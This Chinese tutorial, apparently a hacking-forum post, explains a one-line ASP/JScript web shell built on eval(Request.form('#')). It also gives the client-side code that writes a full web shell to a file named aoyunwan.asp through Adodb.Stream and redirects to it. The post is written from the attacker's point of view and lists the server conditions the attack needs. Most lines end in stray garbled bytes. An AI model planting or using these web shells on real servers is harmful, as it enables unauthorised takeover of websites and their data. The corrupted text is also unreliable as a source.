就拿我们经常使用的冰狐大哥的一句话木马:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>来解释下它的原理. {��OkV�%Q<
首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,例如如下摘自一句话客户端的代码: �.+3g*Dv{&
<textarea name=# cols="80" rows="10"> �yy^q�2��P
set iP=server.createObject("Adodb.Stream") �'4+�
ur`�
iP.Open o�o�j,/IEQ
iP.Type=2 3tIVXtUCUk
iP.CharSet="gb2312" @�]%IK�(�|
iP.writetext request("aoyun") �&tL�gG4pd
iP.SaveToFile server.mappath("aoyunwan.asp"),2 ����#uG%j�
iP.Close 6$Xzp�g�(o
set iP=nothing �m�I-]�/�:
response.redirect "aoyunwan.asp" {�M4gF8�(M
</textarea> UT~4x|b�:O
学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了: [I�,Z2G,Jb
set iP=server.createObject("Adodb.Stream") QC
OM_$��y
iP.Open {t�u�Ys:��
iP.Type=2 .N�i�\�\��
iP.CharSet="gb2312" ��S�"bg9o�
iP.writetext request("aoyun") NdA[C|_8}f
iP.SaveToFile server.mappath("aoyunwan.asp"),2 ~F|+o}a�`
iP.Close y1�eW�pPJa
set iP=nothing 3</_c1�~��
response.redirect "aoyunwan.asp" [2!�w_Iw�'
学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用该对象的writetext方法将request("aoyun")读取过来的内容(就是我们常见的一句话客户端的第二个textarea标记中的内容,也就是我们的大马的代码)写入服务端的 aoyunwan.asp文件中,写入结束后使用set iP=nothing 释放Adodb.Stream对象 然后使用response.redirect "aoyunwan.asp" 转向刚才写入大马代码的文件,也就是我们最后看见的大马了! <e=#F-��DE
不过一句话木马能成功的条件依赖于两个条件:一、服务器端没有禁止Adodb.Stream组件,因为我们使用一句话木马写入大马代码的条件是服务器端创建Adodb.Stream组件,如果该组件被禁用的话是不会写入成功的!还有就是权限的问题,如果当前的虚拟目录禁止user组或者everyone写入操作的话那么也是不会成功的.
